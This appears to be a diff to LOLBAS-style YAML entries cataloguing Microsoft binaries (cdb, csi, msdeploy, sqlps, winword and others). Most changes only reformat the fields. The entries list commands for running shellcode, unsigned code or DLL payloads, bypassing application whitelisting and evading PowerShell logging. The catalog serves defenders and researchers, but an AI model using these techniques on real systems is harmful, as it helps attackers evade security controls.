+  - Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
-Code Sample: []
+Code Sample:
-Detection: []
+  - Code:
+Detection:
+  - IOC:
 Resources:
-  - https://github.com/MoooKitty/Code-Execution
+  - Link: https://github.com/MoooKitty/Code-Execution
-  - https://twitter.com/moo_hax/status/892388990686347264
+  - Link: https://twitter.com/moo_hax/status/892388990686347264
-  - https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/
+  - Link: https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/
-  - https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/
+  - Link: https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/
 Acknowledgement:
   - Person: fab
     Handle: '@0rbz_'
@@ -45,3 +47,4 @@ Acknowledgement:
     Handle: '@moo_hax'
   - Person: Matt Wilson
     Handle: '@enigma0x3'
+---

yml/OtherMSBinaries/Bginfo.yml

@@ -29,13 +29,14 @@ Commands:
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full Path:
-  - No fixed path
+  - Path: No fixed path
 Code Sample:
   - Code:
 Detection:
   - IOC:
 Resources:
-  - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
+  - Link: https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
 Acknowledgement:
   - Person: Oddvar Moe
     Handle: '@oddvarmoe'
+---

yml/OtherMSBinaries/Cdb.yml

@@ -7,20 +7,23 @@ Commands:
   - Command: cdb.exe -cf x64_calc.wds -o notepad.exe
     Description: Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe.
     Usecase: Local execution of assembly shellcode.
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full Path:
-  - C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
+  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
-  - C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
+  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
-Code Sample: []
+Code Sample:
-Detection: []
+  - Code:
+Detection:
+  - IOC:
 Resources:
-  - http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
+  - Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
-  - https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
+  - Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
-  - https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
+  - Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
 Acknoledgement:
   - Person: Matt Graeber
     Handle: '@mattifestation'
+---

yml/OtherMSBinaries/Csi.yml

@@ -7,19 +7,22 @@ Commands:
   - Command: csi.exe file
     Description: Use csi.exe to run unsigned C# code.
     Usecase: Local execution of unsigned C# code.
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full Path:
-  - c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
+  - Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
-  - c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe
+  - Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe
-Code Sample: []
+Code Sample:
-Detection: []
+  - Code:
+Detection:
+  - IOC:
 Resources:
-  - https://twitter.com/subTee/status/781208810723549188
+  - Link: https://twitter.com/subTee/status/781208810723549188
-  - https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
+  - Link: https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
 Acknowledgement:
   - Person: Casey Smith
     Handle: '@subtee'
+---

yml/OtherMSBinaries/Dnx.yml

@@ -7,18 +7,20 @@ Commands:
   - Command: dnx.exe consoleapp
     Description: Execute C# code located in the consoleapp folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies)
     Usecase: Local execution of C# project stored in consoleapp folder.
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full Path:
-  - N/A
+  - Path: N/A
-Code Sample: []
+Code Sample:
-Detection: []
+  - Code:
+Detection:
+  - IOC:
 Resources:
-  - https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
+  - Link: https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
 Acknowledgement:
   - Person: Matt Nelson
     Handle: '@enigma0x3'
-
+---

yml/OtherMSBinaries/Dxcap.yml

@@ -7,18 +7,21 @@ Commands:
   - Command: Dxcap.exe -c C:\Windows\System32\notepad.exe
     Description: Launch notepad as a subprocess of Dxcap.exe
     Usecase: Local execution of a process as a subprocess of Dxcap.exe
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full Path:
-  - c:\Windows\System32\dxcap.exe
+  - Path: C:\Windows\System32\dxcap.exe
-  - c:\Windows\SysWOW64\dxcap.exe
+  - Path: C:\Windows\SysWOW64\dxcap.exe
-Code Sample: []
+Code Sample:
-Detection: []
+  - Code:
+Detection:
+  - IOC:
 Resources:
-  - https://twitter.com/harr0ey/status/992008180904419328
+  - Link: https://twitter.com/harr0ey/status/992008180904419328
 Acknowledgement:
   - Person: Matt harr0ey
     Handle: '@harr0ey'
+---

yml/OtherMSBinaries/Mftrace.yml

@@ -7,7 +7,7 @@ Commands:
   - Command: Mftrace.exe cmd.exe
     Description: Launch cmd.exe as a subprocess of Mftrace.exe.
     Usecase: Local execution of cmd.exe as a subprocess of Mftrace.exe.
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
@@ -15,20 +15,23 @@ Commands:
   - Command: Mftrace.exe powershell.exe
     Description: Launch cmd.exe as a subprocess of Mftrace.exe.
     Usecase: Local execution of powershell.exe as a subprocess of Mftrace.exe.
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full Path:
-  - C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86
+  - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86
-  - C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64
+  - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64
-  - C:\Program Files (x86)\Windows Kits\10\bin\x86
+  - Path: C:\Program Files (x86)\Windows Kits\10\bin\x86
-  - C:\Program Files (x86)\Windows Kits\10\bin\x64
+  - Path: C:\Program Files (x86)\Windows Kits\10\bin\x64
-Code Sample: []
+Code Sample:
-Detection: []
+  - Code:
+Detection:
+  - IOC:
 Resources:
-  - https://twitter.com/0rbz_/status/988911181422186496 (Currently not accessible)
+  - Link: https://twitter.com/0rbz_/status/988911181422186496
 Acknowledgement:
   - Person: fabrizio
     Handle: '@0rbz_'
+---

yml/OtherMSBinaries/Msdeploy.yml

@@ -7,17 +7,20 @@ Commands:
   - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
     Description: Launch calc.bat via msdeploy.exe.
     Usecase: Local execution of batch file using msdeploy.exe.
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full Path:
-  - C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe
+  - Path: C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe
-Code Sample: []
+Code Sample:
-Detection: []
+  - Code:
+Detection:
+  - IOC:
 Resources:
-  - https://twitter.com/pabraeken/status/995837734379032576
+  - Link: https://twitter.com/pabraeken/status/995837734379032576
 Acknowledgement:
   - Person: Pierre-Alexandre Braeken
     Handle: '@pabraeken'
+---

yml/OtherMSBinaries/Msxsl.yml

@@ -21,10 +21,15 @@ Commands:
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full Path:
-  - ''
+  - Path:
-Code Sample: []
+Code Sample:
-Detection: []
+  - Code:
+Detection:
+  - IOC:
 Resources:
-  - https://twitter.com/subTee/status/877616321747271680
+  - Link: https://twitter.com/subTee/status/877616321747271680
-  - https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker
+  - Link: https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker
-Notes: Thanks to Casey Smith - @subTee (Finding), 3gstudent - @3gstudent (Remote)
+Acknowledgement:
+  - Person: Casey Smith
+    Handle: '@subtee'
+---

yml/OtherMSBinaries/Rcsi.yml

@@ -12,11 +12,15 @@ Commands:
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
-Full Path: ''
+Full Path:
-Code Sample: []
+  - Path:
-Detection: []
+Code Sample:
+  - Code:
+Detection:
+  - IOC:
 Resources:
-  - https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/
+  - Link: https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/
 Acknowledgement:
   - Person: Matt Nelson
     Handle: '@enigma0x3'
+---

yml/OtherMSBinaries/Sqldumper.yml

@@ -21,14 +21,17 @@ Commands:
     MitreLink: https://attack.mitre.org/wiki/Technique/T1003
     OperatingSystem: Windows
 Full Path:
-  - C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
+  - Path: C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
-  - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe
+  - Path: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe
-Code Sample: []
+Code Sample:
-Detection: []
+  - Code:
+Detection:
+  - IOC:
 Resources:
-  - https://twitter.com/countuponsec/status/910969424215232518
+  - Link: https://twitter.com/countuponsec/status/910969424215232518
-  - https://twitter.com/countuponsec/status/910977826853068800
+  - Link: https://twitter.com/countuponsec/status/910977826853068800
-  - https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se
+  - Link: https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se
 Acknowledgement:
   - Person: Luis Rocha
     Handle: '@countuponsec'
+---

yml/OtherMSBinaries/Sqlps.yml

@@ -7,17 +7,20 @@ Commands:
   - Command: Sqlps.exe -noprofile
     Description: Drop into a SQL Server PowerShell console without Module and ScriptBlock Logging.
     Usecase: Execute PowerShell commands without ScriptBlock logging.
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full Path:
-  - C:\Program files (x86\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
+  - Path: C:\Program files (x86\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
-Code Sample: []
+Code Sample:
-Detection: []
+  - Code:
+Detection:
+  - IOC:
 Resources:
-  - https://twitter.com/bryon_/status/975835709587075072
+  - Link: https://twitter.com/bryon_/status/975835709587075072
 Acknowledgement:
   - Person: Bryon
     Handle: '@bryon_'
+---

yml/OtherMSBinaries/Sqltoolsps.yml

@@ -7,17 +7,20 @@ Commands:
   - Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe
     Description: Run PowerShell scripts and commands.
     Usecase: Execute PowerShell command.
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full Path:
-  - C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
+  - Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
-Code Sample: []
+Code Sample:
-Detection: []
+  - Code:
+Detection:
+  - IOC:
 Resources:
-  - https://twitter.com/pabraeken/status/993298228840992768
+  - Link: https://twitter.com/pabraeken/status/993298228840992768
 Acknowledgement:
   - Person: Pierre-Alexandre Braeken
     Handle: '@pabraeken'
+---

yml/OtherMSBinaries/Te.yml

@@ -7,16 +7,20 @@ Commands:
   - Command: te.exe bypass.wsc
     Description: Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file.
     Usecase: Execute Visual Basic script stored in local Windows Script Component file.
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
-Full Path: ''
+Full Path:
-Code Sample: []
+  - Path:
-Detection: []
+Code Sample:
+  - Code:
+Detection:
+  - IOC:
 Resources:
-  - https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg
+  - Link: https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg
 Acknowlegement:
   - Person: Giuseppe N3mes1s
     Handle: '@gN3mes1s'
+---

yml/OtherMSBinaries/Tracker.yml

@@ -12,12 +12,16 @@ Commands:
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
-Full Path: ''
+Full Path:
-Code Sample: []
+  - Path:
-Detection: []
+Code Sample:
+  - Code:
+Detection:
+  - IOC:
 Resources:
-  - https://twitter.com/subTee/status/793151392185589760
+  - Link: https://twitter.com/subTee/status/793151392185589760
-  - https://attack.mitre.org/wiki/Execution
+  - Link: https://attack.mitre.org/wiki/Execution
 Acknowledgment:
   - Person: Casey Smith
     Handle: '@subTee'
+---

yml/OtherMSBinaries/Vsjitdebugger.yml

@@ -1,23 +1,26 @@
 ---
 Name: vsjitdebugger.exe
-Description: Just-In-Time (JIT) debugger included with Visual Studio..
+Description: Just-In-Time (JIT) debugger included with Visual Studio
 Author: 'Oddvar Moe'
 Created: '2018-05-25'
 Commands:
   - Command: Vsjitdebugger.exe calc.exe
     Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe.
     Usecase: Execution of local PE file as a subprocess of Vsjitdebugger.exe.
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full Path:
-  - c:\windows\system32\vsjitdebugger.exe
+  - Path: c:\windows\system32\vsjitdebugger.exe
-Code Sample: []
+Code Sample:
-Detection: []
+  - Code:
+Detection:
+  - IOC: 
 Resources:
-  - https://twitter.com/pabraeken/status/990758590020452353
+  - Link: https://twitter.com/pabraeken/status/990758590020452353
 Acknowledgement:
   - Person: Pierre-Alexandre Braeken
     Handle: '@pabraeken'
+---

yml/OtherMSBinaries/Winword.yml

@@ -7,20 +7,23 @@ Commands:
   - Command: winword.exe /l dllfile.dll
     Description: Launch DLL payload.
     Usecase: Execute a locally stored DLL using winword.exe.
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1218
     MItreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full Path:
-  - c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
+  - Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
-Code Sample: []
+Code Sample:
-Detection: []
+  - Code:
+Detection:
+  - IOC:
 Resources:
-  - https://twitter.com/vysecurity/status/884755482707210241
+  - Link: https://twitter.com/vysecurity/status/884755482707210241
-  - https://twitter.com/Hexacorn/status/885258886428725250
+  - Link: https://twitter.com/Hexacorn/status/885258886428725250
 Acknowledgement:
   - Person: Vincent Yiu (cmd)
     Handle: '@@vysecurity'
   - Person: Adam (Internals)
     Handle: '@Hexacorn'
+---